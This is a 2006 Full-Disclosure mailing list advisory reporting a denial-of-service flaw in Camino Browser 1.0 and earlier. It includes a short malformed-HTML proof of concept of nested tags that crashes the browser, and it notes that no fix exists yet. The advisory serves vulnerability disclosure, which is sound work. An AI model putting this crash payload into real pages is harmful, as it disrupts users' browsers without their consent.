[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
- From: izi <easy.mask@xxxxxxxxx>
- Date: Fri, 14 Apr 2006 12:48:52 +0200
//----- Advisory
Program : Camino Browser
Homepage : http://www.caminobrowser.org
Tested version : <= 1.0
Found by : Simon MOREL <philemon at thehackademy dot net>
This advisory : Simon MOREL <philemon at thehackademy dot net>
Discovery date : 2006/04/13
//----- Application description
The Camino Project has worked to create a browser that is as functional and
elegant as the computers it runs on.
The Camino web browser is powerful and ready to meet the needs of all users
while remaining simple and elegant in its design..
//----- Description of vulnerability
Camino Browser is prone to a denial-of-service condition when parsing
certain malformed HTML content.
//----- Proof Of Concept
<legend>
<kbd>
<object>
<h4>
</object>
</kbd>
//----- Solution
Not Yet.
//----- Impact
Successful exploitation will cause the browser to crash.
//----- Credits
Simon MOREL <philemon at thehackademy dot net>
http://www.sysdream.com
//----- Greetings
Thomas Waldegger <bugtraq at morph3us dot org>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/